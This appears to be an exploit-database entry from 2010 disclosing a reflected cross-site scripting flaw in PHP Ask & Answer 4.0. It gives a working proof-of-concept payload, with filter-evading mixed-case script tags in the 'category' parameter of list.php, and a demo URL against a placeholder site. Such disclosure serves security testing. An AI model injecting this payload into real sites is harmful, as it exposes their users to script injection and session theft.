id: 11116
date: 02/27/2010
title: PHP Ask & Answer (XSS) Cross Site Scripting Vulnerability
author: Crux
cves: 

=========================================================
PHP Ask & Answer (XSS) Cross Site Scripting Vulnerability
=========================================================

==============================================================================
    [~] PHP Ask & Answer (XSS) Cross Site Scripting Vulnerability
==============================================================================
    [+] My home          [ http://hack-tech.com ]
    [+] Date Submitted:  [ February 15 2010 ]
    [+] Founder:         [ Crux ]
    [+] Vendor:          [ iLochie ]
    [+] Version:         [ 4.0 ]
    [+] Greetz:          [ HT Team, All maldivians and my love ]
    [+] Dork:            [ NO NO NO! ]


[ EXPLOIT ]

category=1>"><ScRiPt %0D%0A>alert(402406073620)%3B</ScRiPt>.


[ DEMO ]

http://site.com/ask/list.php?category=1>"><ScRiPt %0D%0A>alert(402406073620)%3B</ScRiPt>.

==============================================================================



#  0day.today [2023-03-21]  #